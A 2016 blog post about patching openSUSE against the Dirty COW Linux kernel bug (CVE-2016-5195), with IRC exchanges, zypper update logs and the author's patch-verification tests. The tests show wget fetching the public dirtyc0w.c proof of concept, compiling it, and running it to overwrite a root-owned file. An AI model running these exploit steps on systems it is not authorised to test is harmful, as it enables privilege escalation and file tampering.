How To Patch and Protect Linux Kernel Zero Day Local Privilege Escalation Vulnerability CVE-2016-5195 [ 21/Oct/2016 ]
Posted by jpluimers on 2016/10/21
There is a nasty (Dirty COW: CVE-2016-5195) Linux kernel bug with zero-day exploits floating around
OpenSuSE updates will be available soon (likely this weekend); from the #openSUSE-factory IRC channel :
wiert: any E.T.A. for CVE-2016-5195 in the various releases?
…_Marcus_: 13.1 and 42.1 i just released. 13.2 submission i am still awaiting, so release likely tomorrow
…wiert: How about Tumbleweed?
…DimStar: for TW, I have it in staging and will try to squeeze it into the 1021 snapshot
so unlike something really bad happened, it should be shipping tomorrow or Sunday
via: How To Patch and Protect Linux Kernel Zero Day Local Privilege Escalation Vulnerability CVE-2016-5195 [ 21/Oct/2016 ] [WayBack]
Progress can be tracked at https://bugzilla.suse.com/show_bug.cgi?id=CVE-2016-5195 (via simotek a.k.a. Simon Lees at IRC). Hopefully 13.2 will get released on Monday.
Edit: 13.2 didn’t make it on monday. Progress can be found via https://build.opensuse.org/project/maintenance_incidents/openSUSE:Maintenance (slow loading page!) and is at https://build.opensuse.org/project/show/openSUSE:Maintenance:5752
More exploits at https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
–jeroen
Testing 13.2:
# zypper addrepo http://download.opensuse.org/repositories/openSUSE:/Maintenance:/5752/openSUSE_13.2_Update/openSUSE:Maintenance:5752.repo # zypper patch
This works fine in await of the formal update process and me testing it resulted in the release of the kernel to the official 13.2 update, but note you still have to reboot after the update even though the process doesn’t tell you that:
wiert: @_Marcus_ “klopt als een zwerende vinger” or in English: works splendid. install and test log at https://gist.github.com/jpluimers/42694ab1df04ea1bc8433ae021f9ef7e wiert: @_Marcus_ thanks about teaching me about `zypper patch`. Need to run for the fundraising event now. _Marcus_: wiert: thanks :) wiert: @_Marcus_ no problem. Given the work you guys (and gals?) do it’s a small thing with the added bonus of contributing to my motto “life is about learning new things every day”. _Marcus_: after your feedback i have now released the kenel ;) wiert: @_Marcus_ great, looking forward to the actual update later. Thanks a lot! wiert: @_Marcus_ I’ve updated the gist: 13.2 plus official dirty-COW update needs reboot, but the update process doesn’t list about reboot. Didn’t get the full zypper output, but I after updating I did a before/after reboot comparison of the behaviour. Results in https://gist.github.com/jpluimers/42694ab1df04ea1bc8433ae021f9ef7e#file-testing-official-update-before-reboot-then-reboot-retest-txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # zypper addrepo http://download.opensuse.org/repositories/openSUSE:/Maintenance:/5752/openSUSE_13.2_Update/openSUSE:Maintenance:5752.repo | |
| Adding repository 'openSUSE:Maintenance:5752 (openSUSE_13.2_Update)' ……………………………………………………………………………………………………………………………………………………………………………..[done] | |
| Repository 'openSUSE:Maintenance:5752 (openSUSE_13.2_Update)' successfully added | |
| Enabled : Yes | |
| Autorefresh : No | |
| GPG Check : Yes | |
| URI : http://download.opensuse.org/repositories/openSUSE:/Maintenance:/5752/openSUSE_13.2_Update/ | |
| # zypper patch | |
| New repository or package signing key received: | |
| Repository: openSUSE:Maintenance:5752 (openSUSE_13.2_Update) | |
| Key Name: openSUSE:Maintenance OBS Project <openSUSE:Maintenance@build.opensuse.org> | |
| Key Fingerprint: 7C097045 B0D351D3 69AC453A 598D0E63 B3FD7E48 | |
| Key Created: Thu Aug 6 11:49:53 2015 | |
| Key Expires: Sat Oct 14 11:49:53 2017 | |
| Rpm Name: gpg-pubkey-b3fd7e48-55c32dc1 | |
| Do you want to reject the key, trust temporarily, or trust always? [r/t/a/? shows all options] (r): t | |
| Building repository 'openSUSE:Maintenance:5752 (openSUSE_13.2_Update)' cache ………………………………………………………………………………………………………………………………………………………………………[done] | |
| Loading repository data… | |
| Reading installed packages… | |
| Resolving package dependencies… | |
| The following NEW package is going to be installed: | |
| kernel-default-3.16.7-45.1 | |
| The following NEW patch is going to be installed: | |
| 5752 | |
| 1 new package to install. | |
| Overall download size: 45.2 MiB. Already cached: 0 B After the operation, additional 213.5 MiB will be used. | |
| Continue? [y/n/? shows all options] (y): y | |
| Retrieving package kernel-default-3.16.7-45.1.x86_64 (1/1), 45.2 MiB (213.5 MiB unpacked) | |
| Retrieving: kernel-default-3.16.7-45.1.x86_64.rpm ……………………………………………………………………………………………………………………………………………………………………………………[done (3.6 MiB/s)] | |
| Checking for file conflicts: …………………………………………………………………………………………………………………………………………………………………………………………………………………[done] | |
| (1/1) Installing: kernel-default-3.16.7-45.1 …………………………………………………………………………………………………………………………………………………………………………………………………..[done] | |
| Additional rpm output: | |
| warning: /var/cache/zypp/packages/openSUSE_Maintenance_5752/x86_64/kernel-default-3.16.7-45.1.x86_64.rpm: Header V3 RSA/SHA256 Signature, key ID b3fd7e48: NOKEY | |
| Creating initrd: /boot/initrd-3.16.7-45-default | |
| Executing: /usr/bin/dracut –logfile /var/log/YaST2/mkinitrd.log –force /boot/initrd-3.16.7-45-default 3.16.7-45-default | |
| dracut module 'plymouth' will not be installed, because command 'plymouthd' could not be found! | |
| dracut module 'plymouth' will not be installed, because command 'plymouth' could not be found! | |
| dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found! | |
| dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found! | |
| dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found! | |
| dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found! | |
| dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found! | |
| dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found! | |
| *** Including module: bash *** | |
| *** Including module: warpclock *** | |
| *** Including module: i18n *** | |
| *** Including module: ifcfg *** | |
| *** Including module: btrfs *** | |
| *** Including module: kernel-modules *** | |
| Failed to install module sd_mod | |
| Failed to install module unix | |
| Failed to install module atkbd | |
| Failed to install module i8042 | |
| Omitting driver i2o_scsi | |
| Failed to install module swap | |
| *** Including module: resume *** | |
| *** Including module: rootfs-block *** | |
| *** Including module: terminfo *** | |
| *** Including module: udev-rules *** | |
| Skipping udev rule: 91-permissions.rules | |
| Skipping udev rule: 80-drivers-modprobe.rules | |
| *** Including module: systemd *** | |
| Failed to install module autofs4 | |
| Failed to install module ipv6 | |
| *** Including module: usrmount *** | |
| *** Including module: base *** | |
| *** Including module: fs-lib *** | |
| *** Including module: shutdown *** | |
| *** Including module: suse *** | |
| *** Including modules done *** | |
| *** Installing kernel module dependencies and firmware *** | |
| *** Installing kernel module dependencies and firmware done *** | |
| *** Resolving executable dependencies *** | |
| *** Resolving executable dependencies done*** | |
| *** Hardlinking files *** | |
| *** Hardlinking files done *** | |
| *** Stripping files *** | |
| *** Stripping files done *** | |
| *** Generating early-microcode cpio image *** | |
| *** Constructing GenuineIntel.bin **** | |
| *** Store current command line parameters *** | |
| Stored kernel commandline: | |
| resume=UUID=abc2d6ec-f332-4788-8f30-c4c16e20d80b | |
| root=UUID=6d56201f-f95c-403b-9652-c5fe8833f3ca rootflags=rw,relatime,space_cache rootfstype=btrfs | |
| *** Creating image file *** | |
| *** Creating image file done *** | |
| Some kernel modules could not be included | |
| This is not necessarily an error: | |
| sd_mod | |
| unix | |
| atkbd | |
| i8042 | |
| swap | |
| autofs4 | |
| ipv6 | |
| Update bootloader… | |
| Warning: One of installed patches requires reboot of your machine. Reboot as soon as possible. | |
| # reboot |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (1/3) Installing: kernel-default-3.16.7-45.1 ……………………………………………………………………………………………….[done] | |
| Additional rpm output: | |
| Creating initrd: /boot/initrd-3.16.7-45-default | |
| Executing: /usr/bin/dracut –logfile /var/log/YaST2/mkinitrd.log –force /boot/initrd-3.16.7-45-default 3.16.7-45-default | |
| dracut module 'plymouth' will not be installed, because command 'plymouthd' could not be found! | |
| dracut module 'plymouth' will not be installed, because command 'plymouth' could not be found! | |
| dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found! | |
| dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found! | |
| dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found! | |
| dracut module 'cifs' will not be installed, because command 'mount.cifs' could not be found! | |
| dracut module 'iscsi' will not be installed, because command 'iscsistart' could not be found! | |
| dracut module 'iscsi' will not be installed, because command 'iscsi-iname' could not be found! | |
| *** Including module: bash *** | |
| *** Including module: warpclock *** | |
| *** Including module: i18n *** | |
| *** Including module: ifcfg *** | |
| *** Including module: btrfs *** | |
| *** Including module: kernel-modules *** | |
| Failed to install module sd_mod | |
| Failed to install module unix | |
| Failed to install module atkbd | |
| Failed to install module i8042 | |
| Omitting driver i2o_scsi | |
| Failed to install module swap | |
| *** Including module: resume *** | |
| *** Including module: rootfs-block *** | |
| *** Including module: terminfo *** | |
| *** Including module: udev-rules *** | |
| Skipping udev rule: 91-permissions.rules | |
| Skipping udev rule: 80-drivers-modprobe.rules | |
| *** Including module: systemd *** | |
| Failed to install module autofs4 | |
| Failed to install module ipv6 | |
| *** Including module: usrmount *** | |
| *** Including module: base *** | |
| *** Including module: fs-lib *** | |
| *** Including module: shutdown *** | |
| *** Including module: suse *** | |
| *** Including modules done *** | |
| *** Installing kernel module dependencies and firmware *** | |
| *** Installing kernel module dependencies and firmware done *** | |
| *** Resolving executable dependencies *** | |
| *** Resolving executable dependencies done*** | |
| *** Hardlinking files *** | |
| *** Hardlinking files done *** | |
| *** Stripping files *** | |
| *** Stripping files done *** | |
| *** Generating early-microcode cpio image *** | |
| *** Constructing GenuineIntel.bin **** | |
| *** Store current command line parameters *** | |
| Stored kernel commandline: | |
| resume=UUID=abc2d6ec-f332-4788-8f30-c4c16e20d80b | |
| root=UUID=6d56201f-f95c-403b-9652-c5fe8833f3ca rootflags=rw,relatime,space_cache rootfstype=btrfs | |
| *** Creating image file *** | |
| *** Creating image file done *** | |
| Some kernel modules could not be included | |
| This is not necessarily an error: | |
| sd_mod | |
| unix | |
| atkbd | |
| i8042 | |
| swap | |
| autofs4 | |
| ipv6 | |
| Update bootloader… | |
| (2/3) Installing: ghostscript-9.15-6.1 …………………………………………………………………………………………………….[done] | |
| (3/3) Installing: ghostscript-x11-9.15-6.1 …………………………………………………………………………………………………[done] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c | |
| $ gcc -lpthread dirtyc0w.c -o dirtyc0w | |
| $ sudo su – | |
| # echo this is not a test > foo | |
| # cat foo | |
| this is not a test | |
| # logout | |
| $ ./dirtyc0w foo m00000000000000000 | |
| mmap ffffffffffffffff | |
| madvise -100000000 | |
| procselfmem -100000000 | |
| $ cat foo | |
| cat: foo: No such file or directory | |
| $ sudo su – | |
| # cat foo | |
| this is not a test | |
| # logout |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ cd /tmp/ | |
| $ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c | |
| $ gcc -lpthread dirtyc0w.c -o dirtyc0w | |
| $ sudo su – | |
| # echo this is not a test > foo | |
| # cat foo | |
| this is not a test | |
| # logout | |
| $ ./dirtyc0w foo m00000000000000000 | |
| mmap 7f6ab7207000 | |
| madvise 0 | |
| procselfmem 1800000000 | |
| $ cat foo | |
| m00000000000000000 | |
| $ sudo su – | |
| # reboot | |
| login | |
| $ cd /tmp/ | |
| $ sudo su – | |
| # cat foo | |
| this is not a test | |
| # logout | |
| $ ./dirtyc0w foo m00000000000000000 | |
| mmap 7f5465983000 | |
| madvise 0 | |
| procselfmem 1800000000 | |
| $ cat foo | |
| this is not a test |
The Wiert Corner - irregular stream of stuff 
Leave a comment